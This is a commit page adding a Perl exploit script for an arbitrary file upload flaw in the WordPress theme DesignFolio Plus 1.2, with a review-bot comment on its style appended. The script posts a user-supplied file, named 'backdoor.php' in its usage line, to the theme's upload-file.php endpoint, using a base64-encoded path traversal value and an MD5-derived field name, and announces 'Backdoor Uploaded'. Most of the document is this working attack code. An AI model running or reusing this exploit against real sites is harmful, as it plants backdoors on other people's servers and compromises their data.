WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability
CCrashBandicot committed Jul 7, 2015
1 parent 9092287 commit 53f6ae6
Showing 1 changed file with 30 additions and 0 deletions.
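--- a/DesignFolio.pl
+++ b/DesignFolio.pl
@@ -0,0 +1,30 @@
+#!/usr/bin/perl
+
+use Digest::MD5 qw(md5 md5_hex);
+use MIME::Base64;
+use IO::Socket;
+use LWP::UserAgent;
+
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print "\n\t ! *** # ^_^ # *** !\n\t :p\n\n";
+
+$use = "\n\t [!] ./$0 127.0.0.1 backdoor.php";
+
+($target ,$file) = @ARGV;
+
+die "$use" unless $ARGV[0] && $ARGV[1];
+
+if($target =~ /http:\/\/(.*)\//){ $target = $1; }
+elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
+elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
+elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
+
+my $addr = inet_ntoa((gethostbyname($target))[4]);
+my $digest = md5_hex($addr);
+my $dir = encode_base64('../../../../');
+
+my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
+$pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
+if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
+
+__END__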
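Review bot: The file has no `use strict; use warnings;` after the shebang, so `$use`, `$target`, `$file` and `$pst` are silently created as package globals while `$addr`, `$digest`, `$dir` and `$ua` are lexicals, which is an inconsistent and error-prone mix for a 30-line script. It also carries no header comment; a reader needs the commit title to know what this is, so a POD or comment block after the shebang should state that it is a proof-of-concept for the DesignFolio Plus 1.2 arbitrary file upload issue named in the commit, name the endpoint it exercises (`wp-content/themes/designfolio-plus/admin/upload-file.php`, a base64-encoded `upload_path` and an md5-of-IP field name), and note that the only result check is HTTP success on line 28. That last point matters for anyone reading the script to understand the issue: `is_success` says nothing about whether the server actually accepted the file, so the `[+]` message on line 28 is not evidence of anything.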

